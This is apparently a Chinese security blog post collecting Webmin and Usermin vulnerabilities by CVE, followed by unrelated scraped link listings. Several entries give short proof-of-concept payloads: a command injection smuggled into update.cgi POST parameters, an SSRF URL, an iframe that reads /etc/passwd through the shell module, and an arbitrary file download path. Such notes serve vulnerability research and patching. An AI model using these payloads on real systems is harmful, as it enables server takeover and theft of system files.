简介

开发语言

PHP

用途
系统管理

CVE-2019-15642

Date
2019.7

类型
远程代码执行

影响范围
Webmin <= 1.920

复现
POC|EXP
OBJECT Socket;print "Content-Type: text/plain\n\n";$cmd='id'; print "$cmd\n\n";

分析

反序列化导致远程代码执行

CVE-2019-15107

Date



类型

远程代码执行

影响范围

Webmin <= 1.920

前置条件
/password_change.cgi可访问

复现
POC | EXP


分析

CVE-2019-12840

Date

2019.6

类型

远程代码执行

影响范围

v 1.910

复现
POC|EXP
(1)
POST: https://url/package-updates/update.cgi 
Data: mode=updates&search=&u=apt/apt&u=;${command};/apt&ok_top=Update+Selected+Packages
mode=updates&search=&u=apt/apt&u=;echo ”124“ > asd.txt;%2Fapt&ok=Update+Selected+Packages
(2)
POST: https://url/package-updates/update.cgi 
Data: mode=new&search=&u=;${command};/apt&ok_top=Update+Selected+Packages


分析

XSS vulnerability that leads to Remote Code Execution

Date



类型

XSS导致远程代码执行

影响范围

Webmin version 1.850

前置条件
/at/create_job.cgi可访问
 

CSRF

Date



类型

CSRF

影响范围

Webmin version 1.850

SSRF

Date



类型

SSRF

影响范围

Webmin version 1.850

复现
POC|EXP
https://xx.org:8443/tunnel/link.cgi/https://baidu.com

HTML Email Command Execution Vulnerability

Date

类型

远程命令执行



影响范围
Usermin versions <= 1.080


复现

POC|EXP

<iframe src='/shell/index.cgi?cmd=cat+%2Fetc%2Fpasswd&pwd=%2Fhome%2Fv

ictim&history=' height=0 width=0></iframe>

任意文件下载

Date



类型

任意文件下载

影响范围

DansGuardian Webmin Module DansGuardian Webmin Module 0.5.8
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.6
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.5
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.3
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.2
DansGuardian Webmin Module DansGuardian Webmin Module 0.5.1
DansGuardian Webmin Module DansGuardian Webmin Module 0.4.2
DansGuardian Webmin Module DansGuardian Webmin Module 0.4.1
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.7 a
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.7
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.6
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.5 a
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.5
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.4
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.3
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.2
DansGuardian Webmin Module DansGuardian Webmin Module 0.3.1
DansGuardian Webmin Module DansGuardian Webmin Module 0.2.1
DansGuardian Webmin Module DansGuardian Webmin Module 0.2 .0

前置条件

/dansguardian/edit.cgi 可访问

复现

POC|EXP
https://www.xx.com:10000/dansguardian/edit.cgi?file=[FILE]

应用安全 - 工具 | 平台 -webmin - 漏洞 - 汇总的更多相关文章

  1. 应用安全 - 工具 | 平台 - Weblogic - 漏洞 - 汇总

    控制台路径 | 弱口令  前置条件 /console CVE-2016-0638  Date 类型远程代码执行 影响范围10.3.6, 12.1.2, 12.1.3, 12.2.1  CVE-2016 ...

  2. 应用安全 - 工具 | 平台 - gitlist - 漏洞 - 汇总

    简介 用途 Github仓库查看器 CVE-2014-4511 Date 类型 远程代码执行 影响范围 gitlist 0.4.0及之前版本

  3. 应用安全 - 平台 | 工具 - Centreon Web - 漏洞 - 汇总

    简介 产地 法国 用途 监控 分布 CVE-2019-16405 https://thecybergeek.co.uk/cves/2019/09/19/CVEs.html

  4. 应用安全 - 工具 | 数据库 - redis - 漏洞 - 汇总

    未授权访问 Date 类型 未授权访问导致getshell 影响范围 复现 (1)shell反弹 (2)结合SSH服务 (3)结合web服务 分析

  5. 应用安全 - 软件漏洞 - 可视化平台kibana漏洞汇总

    CVE-2019-7609  Date: 类型: RCE 前置条件: Timelion And Canvas 影响范围: kibana-RCE < PoC | ExP: https://gith ...

  6. ETH&EOS开发资源及工具集合(完整汇总版)

    ETH&EOS开发资源及工具集合(完整汇总版) 3113 ETH开发资源篇 一.开发语言 ·         Solidity - 官方推荐以太坊智能合约开发语言,也是目前最为主流的智能合约语 ...

  7. Android开发之《常用工具及文档汇总》

    GreenVPN:https://www.getgreenjsq.com/ Android开发工具.资料下载汇总:http://androiddevtools.cn/#img-size-handle- ...

  8. 【转】使用kettle工具遇到的问题汇总及解决方案

    使用kettle工具遇到的问题汇总及解决方案   转载文章版权声明:本文转载,原作者薄海 ,原文网址链接 http://blog.csdn.net/bohai0409/article/details/ ...

  9. 【架构】技术-工具-平台-语言&框架

    技术-工具-平台-语言&框架 Techniques | Technology Radar | ThoughtWorks

随机推荐

  1. P2197 【模板】nim游戏

    博弈初心者... 学习地址luogu上可以找到.关于比较好的证明地址放在了地址页里了.这里不再赘述. 大概感觉还是所谓先手必胜就是面对当前局面一定可以采取一种策略,然后后手无论再怎么做,先手都可以“控 ...

  2. thinkphp5.0.22--日志分析和错误调试

    但凡遇到php页面报错信息,我们可以借助phpgjx工具,一款类似postman的工具 来跟踪导致问题的sql信息,这工具的实质是一款文件夹和文件组合,通过Apache和nginx部署 分析排查这类问 ...

  3. Travis CI Could not find or load main class org.gradle.wrapper.GradleWrapperMain 错误

    问题 在 Travis CI 编译的时候出现 Error: Could not find or load main class org.gradle.wrapper.GradleWrapperMain ...

  4. TTTTTTTTTTTTTTTTTTTTT POJ 3690 0与* 二维哈希 模板 +multiset

    Constellations Time Limit: 3000MS   Memory Limit: 65536K Total Submissions: 5923   Accepted: 1164 De ...

  5. luogu P1362 兔子数 x

    P1362 兔子数 题目描述 设 S(N ) 表示 N 的各位数字之和,如 S(484) = 4+8+4 = 16, S(22) = 2+2 = 4.如果一个正整数满足 S(x*x) = S(x) * ...

  6. Python3学习笔记(十三):装饰器

    装饰器就是一个闭包,它的主要作用是在不改变原函数的基础上对原函数功能进行扩展. 我们先来写一个简单的函数: from time import sleep def foo(): print(" ...

  7. Java 工程师成神之路

    基础篇 → 什么是面向对象 面向对象.面向过程 是一种新兴的程序设计方法,或者是一种新的程序设计规范(paradigm),其基本思想是使用对象.类.继承.封装.多态等基本概念来进行程序设计.从现实世界 ...

  8. HDU2082 找单词

    问题分析 不难想到用母函数做. 令自变量\(x\)的次数就是单词价值,那么答案就是\(x\)的\(1\)次到\(50\)次的系数之和.由于我们只需要处理前\(51\)项,所以暴力多项式相乘即可. 举个 ...

  9. Exchanger 原理

    Exchanger(交换者)是一个用于线程间协作的工具类.Exchanger用于进行线程间的数据交换.它提供一个同步点,在这个同步点两个线程可以交换彼此的数据.这两个线程通过exchange方法交换数 ...

  10. JavaWeb_(SSH论坛)_五、帖子模块

    基于SSH框架的小型论坛项目 一.项目入门 传送门 二.框架整合 传送门 三.用户模块 传送门 四.页面显示 传送门 五.帖子模块 传送门 六.点赞模块 传送门 七.辅助模块 传送门 回复帖子 分析回 ...